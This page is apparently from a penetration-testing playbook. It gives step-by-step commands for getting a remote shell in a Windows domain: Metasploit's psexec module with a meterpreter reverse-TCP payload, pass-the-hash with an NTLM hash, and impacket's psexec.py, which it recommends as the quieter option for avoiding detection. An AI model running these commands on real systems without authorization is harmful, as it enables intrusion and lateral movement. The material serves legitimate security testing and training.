Tech With ZDefense PlaybookWeb Exploitation Playbook

Gaining Shell Access

Introduction

When attacking Windows Domain, Shells are not necessarily needed in order to compromise a domain. But if you are stuck or if you want to gather more information/sensitive files, getting into a shell is beneficial.

Metasploit

The problem with Metasploit is that it produces a lot of noise in the network and will be most likely get picked up by security devices.

Run Metasploit

msfconsole

Use PsExec Module

use exploit/windows/smb/psexec

Set Module Options

You would need to set the following module options for you to be able to connect to a host.

  • RHOST - IP Address of the target host.

  • SMBDomain - Windows domain (contoso.local). Set this if you intend to use a Domain Account.

  • SMBPass - Password for the specified username.

  • SMBUser - Username to authenticate as.

Other configurable options:

  • Payload

  • Target

You can use the show options or options command to display the list of configurable options for the module.

show options
set RHOST 192.168.1.1
set SMBDomain contoso.local
set SMBPass password123
set SMBUser john.doe

You can set the Payload by running the command:

Syntax: set payload [payload]

set payload windows/x64/meterpreter/reverse_tcp

Run Exploit

To run the exploit you just need to enter the run or exploit command.

run
Metasploit: PsExec

PsExec using NTLM Hash

You can also use the SAM Hash for PsExec. This is useful if you are unable to crack the hash of a local account. When setting the SMBPass use the whole hash value of the account in the SAM file.

Syntax: set SMBPass [NTLM Hash]

set SMBPass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Unset domain so that we can use local credentials. You can also use set SMBDomain.

unset SMBDomain

PsExec.py

This is much quieter than Metasploit and will not get picked up as much. You can also use this tool with password or with hash.

Using Password

Syntax: psexec.py [domain]/username:['password']@[Target]

psexec.py contoso.local/admin:'Password1'@10.1.1.14
psexec.py: Password

If the password is complex or you are having errors due to the characters in the password, you can use the command psexec.py domain/username:@[IP]. Once you run this command you will then be asked to enter the password.

psexec.py contoso.local/Administrator:@10.1.1.14

Using Hash

Syntax: psexec.py [username]@[IP] -hashes [NTLM Hash]

psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
psexec.py: Hash

Alternative Programs

wmiexec.py: https://github.com/fortra/impacket/blob/master/examples/wmiexec.py

smbexec.py: https://github.com/fortra/impacket/blob/master/examples/smbexec.py

PreviousSMB RelayNextIPv6 Attack

Last updated